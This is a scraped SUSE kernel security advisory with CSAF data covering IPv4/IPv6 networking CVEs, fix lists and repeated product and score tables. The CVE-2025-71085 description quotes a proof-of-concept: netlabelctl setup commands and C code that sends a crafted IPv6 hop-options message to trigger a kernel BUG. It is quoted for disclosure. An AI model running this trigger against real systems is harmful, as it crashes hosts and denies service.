"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1131-1
Vulnerability from csaf_suse - Published: 2026-03-27 16:02 - Updated: 2026-03-27 16:02Summary
Security update for the Linux Kernel
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel
Description of the patch:
The SUSE Linux Enterprise 15 SP4 RT kernel was updated to fix various security issues
The following security issues were fixed:
- CVE-2024-46854: net: dpaa: Pad packets to ETH_ZLEN (bsc#1231084).
- CVE-2025-21738: ata: libata-sff: Ensure that we cannot write outside the allocated buffer (bsc#1238917).
- CVE-2025-40242: gfs2: Fix unlikely race in gdlm_put_lock (bsc#1255075).
- CVE-2025-68312: usbnet: Prevents free active kevent (bsc#1255171).
- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change
(bsc#1256645).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).
- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).
- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).
- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).
- CVE-2026-23004: dst: fix races in rt6_uncached_list_del() and rt_del_uncached_list() (bsc#1257231).
- CVE-2026-23060: crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec (bsc#1257735).
- CVE-2026-23074: net/sched: Enforce that teql can only be used as root qdisc (bsc#1257749).
- CVE-2026-23089: ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (bsc#1257790).
- CVE-2026-23191: ALSA: aloop: Fix racy access at PCM trigger (bsc#1258395).
- CVE-2026-23204: net: add skb_header_pointer_careful() helper (bsc#1258340).
- CVE-2026-23209: macvlan: fix error recovery in macvlan_common_newlink() (bsc#1258518).
- CVE-2026-23268: apparmor: fix unprivileged local user can do privileged policy management (bsc#1258850).
- CVE-2026-23269: apparmor: validate DFA start states are in bounds in unpack_pdb (bsc#1259857).
The following non security issues were fixed:
- apparmor: fix differential encoding verification (bsc#1258849).
- apparmor: Fix double free of ns_name in aa_replace_profiles() (bsc#1258849).
- apparmor: fix memory leak in verify_header (bsc#1258849).
- apparmor: fix missing bounds check on DEFAULT table in verify_dfa() (bsc#1258849).
- apparmor: fix race between freeing data and fs accessing it (bsc#1258849).
- apparmor: fix race on rawdata dereference (bsc#1258849).
- apparmor: fix side-effect bug in match_char() macro usage (bsc#1258849).
- apparmor: fix unprivileged local user can do privileged policy management (bsc#1258849).
- apparmor: fix: limit the number of levels of policy namespaces (bsc#1258849).
- apparmor: replace recursive profile removal with iterative approach (bsc#1258849).
- apparmor: validate DFA start states are in bounds in unpack_pdb (bsc#1258849).
- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).
- net: tcp: allow zero-window ACK update the window (bsc#1254767).
- net: tcp: send zero-window ACK when no memory (bsc#1254767).
- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).
- tcp: correct handling of extreme memory squeeze (bsc#1254767).
- x86/its: Fix crash during dynamic its initialization (bsc#1257771).
- x86/modules: Set VM_FLUSH_RESET_PERMS in module_alloc() (bsc#1257771).
Patchnames: SUSE-2026-1131,SUSE-SLE-Micro-5.3-2026-1131,SUSE-SLE-Micro-5.4-2026-1131
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.8 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
7.8 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
4.7 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
6.7 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
6.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
6.6 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
7.8 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
